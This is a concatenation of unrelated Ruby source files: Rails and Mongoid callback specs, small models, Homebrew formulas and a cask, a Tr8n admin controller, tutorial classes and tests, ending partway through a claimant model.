let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_save_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_save_called).to be true
end
end
end
describe "#before_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
context "when the child is dirty" do
before do
track.name = "Rusty Nails"
band.save
end
let(:reloaded) do
band.reload.records.first
end
it "executes the callback" do
expect(track.before_update_called).to be true
end
it "persists the change" do
expect(reloaded.tracks.first.before_update_called).to be true
end
end
context "when the child is not dirty" do
before do
band.save
end
it "does not execute the callback" do
expect(track.before_update_called).to be false
end
end
end
end
describe '#after_destroy' do
context 'when the parent is updated in a child after_destroy callback' do
let!(:person) do
Person.create!(ordered_posts: [OrderedPost.new])
end
before do
post = OrderedPost.first
post.destroy
end
it 'updates the parent' do
expect(person.reload.title).to eq('Minus one ordered post.')
end
end
end
describe "#before_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_validation_called).to be true
end
end
end
end
end
context "callback on valid?" do
it "goes in all validation callback in good order" do
shin = ValidationCallback.new
shin.valid?
expect(shin.history).to eq([:before_validation, :validate, :after_validation])
end
end
context "when creating child documents in callbacks" do
let(:parent) do
ParentDoc.new
end
before do
parent.save
end
it "does not duplicate the child documents" do
parent.children.create(position: 1)
expect(ParentDoc.find(parent.id).children.size).to eq(1)
end
end
context "when callbacks cancel persistence" do
let(:address) do
Address.new(street: "123 Sesame")
end
before(:all) do
Person.before_save do |doc|
throw(:abort) if doc.mode == :prevent_save
end
end
after(:all) do
Person.reset_callbacks(:save)
end
context "when creating a document" do
let(:person) do
Person.new(mode: :prevent_save, title: "Associate", addresses: [ address ])
end
it "fails to save" do
expect(person).to be_valid
expect(person.save).to be false
end
it "is a new record" do
expect(person).to be_a_new_record
expect { person.save }.not_to change { person.new_record? }
end
it "is left dirty" do
expect(person).to be_changed
expect { person.save }.not_to change { person.changed? }
end
it "child documents are left dirty" do
expect(address).to be_changed
expect { person.save }.not_to change { address.changed? }
end
end
context "when updating a document" do
let(:person) do
Person.create.tap do |person|
person.attributes = {
mode: :prevent_save,
title: "Associate",
addresses: [ address ]
}
end
end
it "#save returns false" do
expect(person).to be_valid
expect(person.save).to be false
end
it "is a not a new record" do
expect(person).to_not be_a_new_record
expect { person.save }.not_to change { person.new_record? }
end
it "is left dirty" do
expect(person).to be_changed
expect { person.save }.not_to change { person.changed? }
end
it "child documents are left dirty" do
expect(address).to be_changed
expect { person.save }.not_to change { address.changed? }
end
end
end
context "when loading a model multiple times" do
before do
load File.join(MODELS, "callback_test.rb")
load File.join(MODELS, "callback_test.rb")
end
let(:callback) do
CallbackTest.new
end
context "when saving the document" do
it "only executes the callbacks once" do
expect(callback).to receive(:execute).once
callback.save
end
end
end
context 'when creating a parent and embedded child' do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbParent.new(registry).tap do |parent|
parent.cb_children << InterceptableSpec::CbChild.new(registry, cb_parent: parent)
end
end
let(:expected) do
[
[InterceptableSpec::CbParent, :before_validation],
[InterceptableSpec::CbChild, :before_validation],
[InterceptableSpec::CbChild, :after_validation],
[InterceptableSpec::CbParent, :after_validation],
[InterceptableSpec::CbParent, :before_save],
[InterceptableSpec::CbParent, :around_save_open],
[InterceptableSpec::CbParent, :before_create],
[InterceptableSpec::CbParent, :around_create_open],
[InterceptableSpec::CbParent, :around_create_close],
[InterceptableSpec::CbParent, :after_create],
[InterceptableSpec::CbParent, :around_save_close],
[InterceptableSpec::CbParent, :after_save],
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context 'when creating a parent and embedded child with cascading callbacks' do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbParent.new(registry).tap do |parent|
parent.cb_cascaded_children <<
InterceptableSpec::CbCascadedChild.new(registry, cb_parent: parent)
end
end
let(:expected) do
[
[InterceptableSpec::CbCascadedChild, :before_validation],
[InterceptableSpec::CbCascadedChild, :after_validation],
[InterceptableSpec::CbParent, :before_validation],
[InterceptableSpec::CbCascadedChild, :before_validation],
[InterceptableSpec::CbCascadedChild, :after_validation],
[InterceptableSpec::CbParent, :after_validation],
[InterceptableSpec::CbParent, :before_save],
[InterceptableSpec::CbParent, :around_save_open],
[InterceptableSpec::CbParent, :before_create],
[InterceptableSpec::CbParent, :around_create_open],
[InterceptableSpec::CbCascadedChild, :before_save],
[InterceptableSpec::CbCascadedChild, :around_save_open],
[InterceptableSpec::CbCascadedChild, :before_create],
[InterceptableSpec::CbCascadedChild, :around_create_open],
[InterceptableSpec::CbCascadedChild, :around_create_close],
[InterceptableSpec::CbCascadedChild, :after_create],
[InterceptableSpec::CbCascadedChild, :around_save_close],
[InterceptableSpec::CbCascadedChild, :after_save],
[InterceptableSpec::CbParent, :around_create_close],
[InterceptableSpec::CbParent, :after_create],
[InterceptableSpec::CbParent, :around_save_close],
[InterceptableSpec::CbParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "with associations" do
context "has_one" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbHasOneParent.new(registry).tap do |parent|
parent.child = InterceptableSpec::CbHasOneChild.new(registry)
end
end
let(:expected) do
[
[InterceptableSpec::CbHasOneParent, :before_validation],
[InterceptableSpec::CbHasOneChild, :before_validation],
[InterceptableSpec::CbHasOneChild, :after_validation],
[InterceptableSpec::CbHasOneParent, :after_validation],
[InterceptableSpec::CbHasOneParent, :before_save],
[InterceptableSpec::CbHasOneParent, :around_save_open],
[InterceptableSpec::CbHasOneParent, :before_create],
[InterceptableSpec::CbHasOneParent, :around_create_open],
[InterceptableSpec::CbHasOneParent, :insert_into_database],
[InterceptableSpec::CbHasOneChild, :before_validation],
[InterceptableSpec::CbHasOneChild, :after_validation],
[InterceptableSpec::CbHasOneChild, :before_save],
[InterceptableSpec::CbHasOneChild, :around_save_open],
[InterceptableSpec::CbHasOneChild, :before_create],
[InterceptableSpec::CbHasOneChild, :around_create_open],
[InterceptableSpec::CbHasOneChild, :around_create_close],
[InterceptableSpec::CbHasOneChild, :after_create],
[InterceptableSpec::CbHasOneChild, :around_save_close],
[InterceptableSpec::CbHasOneChild, :after_save],
[InterceptableSpec::CbHasOneParent, :around_create_close],
[InterceptableSpec::CbHasOneParent, :after_create],
[InterceptableSpec::CbHasOneParent, :around_save_close],
[InterceptableSpec::CbHasOneParent, :after_save],
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "embeds_one" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbEmbedsOneParent.new(registry).tap do |parent|
parent.child = InterceptableSpec::CbEmbedsOneChild.new(registry)
end
end
context "create" do
let(:expected) do
[
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_save],
[InterceptableSpec::CbEmbedsOneParent, :around_save_open],
[InterceptableSpec::CbEmbedsOneParent, :before_create],
[InterceptableSpec::CbEmbedsOneParent, :around_create_open],
[InterceptableSpec::CbEmbedsOneChild, :before_save],
[InterceptableSpec::CbEmbedsOneChild, :around_save_open],
[InterceptableSpec::CbEmbedsOneChild, :before_create],
[InterceptableSpec::CbEmbedsOneChild, :around_create_open],
[InterceptableSpec::CbEmbedsOneParent, :insert_into_database],
[InterceptableSpec::CbEmbedsOneChild, :around_create_close],
[InterceptableSpec::CbEmbedsOneChild, :after_create],
[InterceptableSpec::CbEmbedsOneChild, :around_save_close],
[InterceptableSpec::CbEmbedsOneChild, :after_save],
[InterceptableSpec::CbEmbedsOneParent, :around_create_close],
[InterceptableSpec::CbEmbedsOneParent, :after_create],
[InterceptableSpec::CbEmbedsOneParent, :around_save_close],
[InterceptableSpec::CbEmbedsOneParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "update" do
let(:expected) do
[
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :before_validation],
[InterceptableSpec::CbEmbedsOneChild, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :after_validation],
[InterceptableSpec::CbEmbedsOneParent, :before_save],
[InterceptableSpec::CbEmbedsOneParent, :around_save_open],
[InterceptableSpec::CbEmbedsOneParent, :before_update],
[InterceptableSpec::CbEmbedsOneParent, :around_update_open],
[InterceptableSpec::CbEmbedsOneChild, :before_save],
[InterceptableSpec::CbEmbedsOneChild, :around_save_open],
[InterceptableSpec::CbEmbedsOneChild, :before_update],
[InterceptableSpec::CbEmbedsOneChild, :around_update_open],
[InterceptableSpec::CbEmbedsOneChild, :around_update_close],
[InterceptableSpec::CbEmbedsOneChild, :after_update],
[InterceptableSpec::CbEmbedsOneChild, :around_save_close],
[InterceptableSpec::CbEmbedsOneChild, :after_save],
[InterceptableSpec::CbEmbedsOneParent, :around_update_close],
[InterceptableSpec::CbEmbedsOneParent, :after_update],
[InterceptableSpec::CbEmbedsOneParent, :around_save_close],
[InterceptableSpec::CbEmbedsOneParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.callback_registry = nil
parent.child.callback_registry = nil
parent.save!
parent.callback_registry = registry
parent.child.callback_registry = registry
parent.name = "name"
parent.child.age = 10
parent.save!
expect(registry.calls).to eq expected
end
end
end
context "has_many" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbHasManyParent.new(registry).tap do |parent|
parent.children = [
InterceptableSpec::CbHasManyChild.new(registry),
InterceptableSpec::CbHasManyChild.new(registry)
]
end
end
let(:expected) do
[
[InterceptableSpec::CbHasManyParent, :before_validation],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyParent, :after_validation],
[InterceptableSpec::CbHasManyParent, :before_save],
[InterceptableSpec::CbHasManyParent, :around_save_open],
[InterceptableSpec::CbHasManyParent, :before_create],
[InterceptableSpec::CbHasManyParent, :around_create_open],
[InterceptableSpec::CbHasManyParent, :insert_into_database],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_save],
[InterceptableSpec::CbHasManyChild, :around_save_open],
[InterceptableSpec::CbHasManyChild, :before_create],
[InterceptableSpec::CbHasManyChild, :around_create_open],
[InterceptableSpec::CbHasManyChild, :around_create_close],
[InterceptableSpec::CbHasManyChild, :after_create],
[InterceptableSpec::CbHasManyChild, :around_save_close],
[InterceptableSpec::CbHasManyChild, :after_save],
[InterceptableSpec::CbHasManyChild, :before_validation],
[InterceptableSpec::CbHasManyChild, :after_validation],
[InterceptableSpec::CbHasManyChild, :before_save],
[InterceptableSpec::CbHasManyChild, :around_save_open],
[InterceptableSpec::CbHasManyChild, :before_create],
[InterceptableSpec::CbHasManyChild, :around_create_open],
[InterceptableSpec::CbHasManyChild, :around_create_close],
[InterceptableSpec::CbHasManyChild, :after_create],
[InterceptableSpec::CbHasManyChild, :around_save_close],
[InterceptableSpec::CbHasManyChild, :after_save],
[InterceptableSpec::CbHasManyParent, :around_create_close],
[InterceptableSpec::CbHasManyParent, :after_create],
[InterceptableSpec::CbHasManyParent, :around_save_close],
[InterceptableSpec::CbHasManyParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
context "embeds_many" do
let(:registry) { InterceptableSpec::CallbackRegistry.new }
let(:parent) do
InterceptableSpec::CbEmbedsManyParent.new(registry).tap do |parent|
parent.children = [
InterceptableSpec::CbEmbedsManyChild.new(registry),
InterceptableSpec::CbEmbedsManyChild.new(registry),
]
end
end
let(:expected) do
[
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyChild, :before_validation],
[InterceptableSpec::CbEmbedsManyChild, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :after_validation],
[InterceptableSpec::CbEmbedsManyParent, :before_save],
[InterceptableSpec::CbEmbedsManyParent, :around_save_open],
[InterceptableSpec::CbEmbedsManyParent, :before_create],
[InterceptableSpec::CbEmbedsManyParent, :around_create_open],
[InterceptableSpec::CbEmbedsManyChild, :before_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_open],
[InterceptableSpec::CbEmbedsManyChild, :before_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_open],
[InterceptableSpec::CbEmbedsManyChild, :before_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_open],
[InterceptableSpec::CbEmbedsManyChild, :before_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_open],
[InterceptableSpec::CbEmbedsManyParent, :insert_into_database],
[InterceptableSpec::CbEmbedsManyChild, :around_create_close],
[InterceptableSpec::CbEmbedsManyChild, :after_create],
[InterceptableSpec::CbEmbedsManyChild, :around_create_close],
[InterceptableSpec::CbEmbedsManyChild, :after_create],
[InterceptableSpec::CbEmbedsManyChild, :around_save_close],
[InterceptableSpec::CbEmbedsManyChild, :after_save],
[InterceptableSpec::CbEmbedsManyChild, :around_save_close],
[InterceptableSpec::CbEmbedsManyChild, :after_save],
[InterceptableSpec::CbEmbedsManyParent, :around_create_close],
[InterceptableSpec::CbEmbedsManyParent, :after_create],
[InterceptableSpec::CbEmbedsManyParent, :around_save_close],
[InterceptableSpec::CbEmbedsManyParent, :after_save]
]
end
it 'calls callbacks in the right order' do
parent.save!
expect(registry.calls).to eq expected
end
end
end
end
| 26.002403 | 94 | 0.570549 |
1d6d8f7b395192e850e1b837802309af2abd6842 | 162 | class VaclPermission < ActiveRecord::Base
has_many :vacl_permission_collections
has_many :vacl_permission_sets, :through => :vacl_permission_collections
end
| 27 | 74 | 0.833333 |
79084efcb231ac5084d55fce24e4d1fb6f73765e | 1,685 | class Confuse < Formula
desc "Configuration file parser library written in C"
homepage "https://github.com/martinh/libconfuse"
url "https://github.com/martinh/libconfuse/releases/download/v3.3/confuse-3.3.tar.xz"
sha256 "1dd50a0320e135a55025b23fcdbb3f0a81913b6d0b0a9df8cc2fdf3b3dc67010"
license "ISC"
bottle do
sha256 "370cd5df07249d44cbf0a848001be19d41341f404d229dcdcb3b5ae6ead4300c" => :big_sur
sha256 "1eeec2cb7b54cf11c1e13448f191ed97d4f2477c215130b6402256678019f36e" => :arm64_big_sur
sha256 "13ad01ca606e746ab7f6bcd42b0da08abdcc29ccaaa9e8106f9d28bfe96bffd7" => :catalina
sha256 "d6038fe2a7fcfea4ba6e3c29174cb6201ce7d05e22ef4c76b881b9f12dabcff6" => :mojave
sha256 "371f699488d7e4459251c55e4ef4d9087b08e07b4fedfc553476bc30070ca9c1" => :high_sierra
sha256 "f33b7f3eb72f36f423997e802ef9f9a427b0690e2ef04ec97b005c694979d523" => :x86_64_linux
end
depends_on "pkg-config" => :build
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "check"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <confuse.h>
#include <stdio.h>
cfg_opt_t opts[] =
{
CFG_STR("hello", NULL, CFGF_NONE),
CFG_END()
};
int main(void)
{
cfg_t *cfg = cfg_init(opts, CFGF_NONE);
if (cfg_parse_buf(cfg, "hello=world") == CFG_SUCCESS)
printf("%s\\n", cfg_getstr(cfg, "hello"));
cfg_free(cfg);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lconfuse", "-o", "test"
assert_match /world/, shell_output("./test")
end
end
| 33.7 | 95 | 0.686053 |
f76cfbabb631df52b2576580c5dd86a0d059c5d0 | 1,240 | module ActiveSupport
module Multibyte #:nodoc:
DEFAULT_NORMALIZATION_FORM = :kc
NORMALIZATIONS_FORMS = [:c, :kc, :d, :kd]
UNICODE_VERSION = '5.0.0'
# Regular expressions that describe valid byte sequences for a character
VALID_CHARACTER = {
# Borrowed from the Kconv library by Shinji KONO - (also as seen on the W3C site)
'UTF-8' => /\A(?:
[\x00-\x7f] |
[\xc2-\xdf] [\x80-\xbf] |
\xe0 [\xa0-\xbf] [\x80-\xbf] |
[\xe1-\xef] [\x80-\xbf] [\x80-\xbf] |
\xf0 [\x90-\xbf] [\x80-\xbf] [\x80-\xbf] |
[\xf1-\xf3] [\x80-\xbf] [\x80-\xbf] [\x80-\xbf] |
\xf4 [\x80-\x8f] [\x80-\xbf] [\x80-\xbf])\z /xn,
# Quick check for valid Shift-JIS characters, disregards the odd-even pairing
'Shift_JIS' => /\A(?:
[\x00-\x7e \xa1-\xdf] |
[\x81-\x9f \xe0-\xef] [\x40-\x7e \x80-\x9e \x9f-\xfc])\z /xn
}
end
end
require 'active_support/multibyte/chars'
require 'active_support/multibyte/utils' | 45.925926 | 87 | 0.457258 |
ffd629dd89cfe2ba8312f802171cb67214e3d942 | 138 | class Topic < ActiveRecord::Base
has_many :topicals
has_many :articles, :through => :topicals
validates :title, :presence => true
end
| 19.714286 | 42 | 0.73913 |
6197fcb99f113c9c4a30ce5948bed42aa4382db9 | 6,621 | #--
# Copyright (c) 2010-2013 Michael Berkovich, tr8nhub.com
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
class Tr8n::Admin::SourcesController < Tr8n::Admin::BaseController
def index
@sources = Tr8n::TranslationSource.filter(:params => params, :filter => Tr8n::TranslationSourceFilter)
end
def view
@source = Tr8n::TranslationSource.find_by_id(params[:id])
unless @source
trfe("Invalid source id")
return redirect_to_source
end
if params[:mode] == "translation_keys"
conditions = ["tks.translation_source_id = ?", @source.id]
unless params[:q].blank?
conditions[0] << " and (tr8n_translation_keys.label like ? or tr8n_translation_keys.description like ?)"
conditions << "%#{params[:q]}%"
conditions << "%#{params[:q]}%"
end
@results = Tr8n::TranslationKey.find(:all,
:select => "distinct tr8n_translation_keys.id, tr8n_translation_keys.created_at, label, description, locale, admin, level, translation_count",
:order => "tr8n_translation_keys.created_at desc",
:conditions => conditions,
:joins => [
"join tr8n_translation_key_sources as tks on tr8n_translation_keys.id = tks.translation_key_id",
]
).page(page).per(per_page)
elsif params[:mode] == "translations"
conditions = ["tks.translation_source_id = ?", @source.id]
unless params[:q].blank?
conditions[0] << " and (tr8n_translations.label like ?)"
conditions << "%#{params[:q]}%"
end
@results = Tr8n::Translation.find(:all,
:order => "tr8n_translations.created_at desc",
:conditions => conditions,
:joins => [
"join tr8n_translation_keys as tk on tr8n_translations.translation_key_id = tk.id",
"join tr8n_translation_key_sources as tks on tk.id = tks.translation_key_id",
]
).uniq.page(page).per(per_page)
else
filter = {"wf_c0" => "translation_source_id", "wf_o0" => "is", "wf_v0_0" => @source.id}
@metrics = Tr8n::TranslationSourceMetric.filter(:params => params.merge(filter))
@metrics.wf_filter.extra_params.merge!({:id => @source.id})
end
end
def recalculate_metric
metric = Tr8n::TranslationSourceMetric.find_by_id(params[:metric_id])
unless metric
trfe("Invalid metric id")
return redirect_to_source
end
metric.update_metrics!
trfn("The metric has been updated")
redirect_to_source
end
def recalculate_source
source = Tr8n::TranslationSource.find_by_id(params[:id])
unless source
trfe("Invalid source id")
return redirect_to_source
end
source.translation_source_metrics.each do |metric|
metric.update_metrics!
end
trfn("All metrics have been updated")
redirect_to_source
end
def remove_keys_from_source
source = Tr8n::TranslationSource.find_by_id(params[:id])
unless source
trfe("Invalid source id")
return redirect_to_source
end
if params[:all] == "true"
Tr8n::TranslationKeySource.delete_all(["translation_source_id = ?", source.id])
elsif params[:ids]
Tr8n::TranslationKeySource.delete_all(["translation_source_id = ? and translation_key_id in (?)", source.id, params[:ids]])
end
trfn("Keys have been removed")
source.translation_source_metrics.each do |metric|
metric.update_metrics!
end
redirect_to_source
end
def lb_update
@source = Tr8n::TranslationSource.find_by_id(params[:id]) unless params[:id].blank?
@source = Tr8n::TranslationSource.new unless @source
@apps = Tr8n::Application.options
if request.post?
if @source
@source.update_attributes(params[:source])
else
@source = Tr8n::TranslationSource.create(params[:source])
end
return dismiss_lightbox
end
render :layout => false
end
def key_sources
@key_sources = Tr8n::TranslationKeySource.filter(:params => params, :filter => Tr8n::TranslationKeySourceFilter)
end
def lb_caller
@key_source = Tr8n::TranslationKeySource.find(params[:key_source_id])
@caller = @key_source.details[params[:caller_key]]
render_lightbox
end
def lb_add_to_component
if request.post?
if params[:comp][:key].strip.blank?
component = Tr8n::Component.find_by_id(params[:comp_id])
else
component = Tr8n::Component.create(params[:comp])
end
sources = (params[:sources] || '').split(',')
if sources.any?
sources = Tr8n::TranslationSource.find(:all, :conditions => ["id in (?)", sources])
sources.each do |source|
Tr8n::ComponentSource.find_or_create(component, source)
end
end
translators = (params[:translators] || '').split(',')
if translators.any?
translators = Tr8n::Translator.find(:all, :conditions => ["id in (?)", translators])
translators.each do |translator|
Tr8n::ComponentTranslator.find_or_create(component, translator)
end
end
languages = (params[:languages] || '').split(',')
if languages.any?
languages = Tr8n::Language.find(:all, :conditions => ["id in (?)", languages])
languages.each do |language|
Tr8n::ComponentLanguage.find_or_create(component, language)
end
end
return dismiss_lightbox
end
@apps = Tr8n::Application.options
@components = Tr8n::Component.find(:all, :order => "name asc, key asc").collect{|c| [c.name_and_key, c.id]}
render_lightbox
end
end | 34.305699 | 152 | 0.6715 |
e83a5b12985fecf6972bb90cfafc1ca29703a106 | 1,535 | class Microplane < Formula
desc "CLI tool to make git changes across many repos"
homepage "https://github.com/Clever/microplane"
url "https://github.com/Clever/microplane/archive/v0.0.23.tar.gz"
sha256 "0243aa58559b8a43f5fa7324eee05d490899aa73294737e47451d1fc994769f5"
license "Apache-2.0"
head "https://github.com/Clever/microplane.git"
bottle do
cellar :any_skip_relocation
sha256 "b63bb1e0cae29c2b15cf24bebafaa0422c978570d36d6c81c9c613d65b2e091e" => :big_sur
sha256 "adfd90c4bbc09e44720f246cd719c508d7215b5ab6f9ad756c37018874e92dc4" => :catalina
sha256 "2e5906f81eb7ad280b115c22cd2e88a28daf2b612bb7f35744ace27ab0d2dd9c" => :mojave
sha256 "c5a414e1fa758fcb3d8b8a57b7edf3ea9174a7a71646d9a8e0f10dd2c07fb6ef" => :high_sierra
end
depends_on "dep" => :build
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
dir = buildpath/"src/github.com/Clever/microplane"
dir.install buildpath.children
cd "src/github.com/Clever/microplane" do
system "make", "install_deps"
system "make", "build"
bin.install "bin/mp"
end
end
test do
# mandatory env variable
ENV["GITHUB_API_TOKEN"] = "test"
# create repos.txt
(testpath/"repos.txt").write <<~EOF
hashicorp/terraform
EOF
# create mp/init.json
shell_output("mp init -f #{testpath}/repos.txt")
# test command
output = shell_output("mp plan -b microplaning -m 'microplane fun' -r terraform -- sh echo 'hi' 2>&1")
assert_match "planning", output
end
end
| 33.369565 | 106 | 0.726384 |
26abd247dbd230c6d8e710a26206ddb7fb3e42bb | 214 | Rails.application.routes.draw do
# sets views/listings/index.html.erb as the root of the website
root 'listings#index'
# create all the routes neeeded for listings (C.R.U.D.)
resources :listings
end
| 21.4 | 65 | 0.724299 |
21d764fc177809a39ad3a254ab32bf251b510080 | 938 | class Person
def initialize(name, age)
@name = name
@age = age
end
def get_info
@additiona_info = "Interesting"
"Name: #{@name}, age #{@age}"
end
def name
@name
end
def name= (new_name)
@name = new_name
end
end
class PersonNew
attr_accessor :name, :age
end
person2 = PersonNew.new
p person2.name
p person2.age
person2.name = "Sally"
person2.age = 77
puts person2.name
puts person2.age
person1 = Person.new("Joanna", 34)
p person1.instance_variables
puts person1.get_info
p person1.instance_variables
person1.name = "Mike"
puts person1.name
class PersonNewAgain
attr_reader :age
attr_accessor :name
def initialize(name, ageVar)
@name = name
self.age = ageVar
puts age
end
def age= (new_age)
@age = @age || 5
@age = new_age unless new_age > 120
end
end
person3 = PersonNewAgain.new("Kim", 130)
puts "My age is #{person3.age}"
person3.age = 100
puts person3.age
| 17.054545 | 40 | 0.685501 |
33a8fd476e0ca0ae988f58d004a50328d243db63 | 274 | class OnyxLion < Cask
version '2.4.8'
sha256 'e637359020d3514cf1fe40d1f616692919c41aed926a395bbc7093b256e42e35'
url 'http://www.titanium.free.fr/download/107/OnyX.dmg'
homepage 'http://www.titanium.free.fr/downloadonyx.php'
license :unknown
app 'OnyX.app'
end
| 24.909091 | 75 | 0.766423 |
f7ffd9151a56f987575ab557cde3e0b1843d46f5 | 395 | # frozen_string_literal: true
module Ivapi
class Client
class Hosting < Base
attr_reader :hosting_id
def initialize(client, hosting_id)
super(client)
@hosting_id = hosting_id
end
def information
params = { command: 'hosting_info', id: hosting_id }
get('/json.php', params)
end
alias info information
end
end
end
| 18.809524 | 60 | 0.622785 |
335156032b78f29a252c85f5d89d940ab0ae0e67 | 642 | require 'test_helper'
class StaticPagesControllerTest <
ActionDispatch::IntegrationTest
test "should get home" do
get root_path
assert_response :success
assert_select "title", "Ruby on Rails Tutorial Sample App"
end
test "should get help" do
get help_path
assert_response :success
assert_select "title", "Help | Ruby on Rails Tutorial Sample App"
end
test "should get about" do
get about_path
assert_response :success
assert_select "title", "About | Ruby on Rails Tutorial Sample App"
end
test "should get contact" do
get contact_path
assert_response :success
assert_select "title", "Contact | Ruby on Rails Tutorial Sample App"
end
end | 21.4 | 68 | 0.797508 |
ed38cc0f1c69d2f270f2f0fe8feb1172ad87d844 | 520 | # frozen_string_literal: true
class BgsRelatedClaimant < Claimant
include AssociatedBgsRecord
validate { |claimant| ClaimantValidator.new(claimant).validate }
def fetch_bgs_record
general_info = bgs.fetch_claimant_info_by_participant_id(participant_id)
name_info = bgs.fetch_person_info(participant_id)
general_info.merge(name_info)
end
def bgs_payee_code
return unless bgs_record
bgs_record[:payee_code]
end
def bgs_record
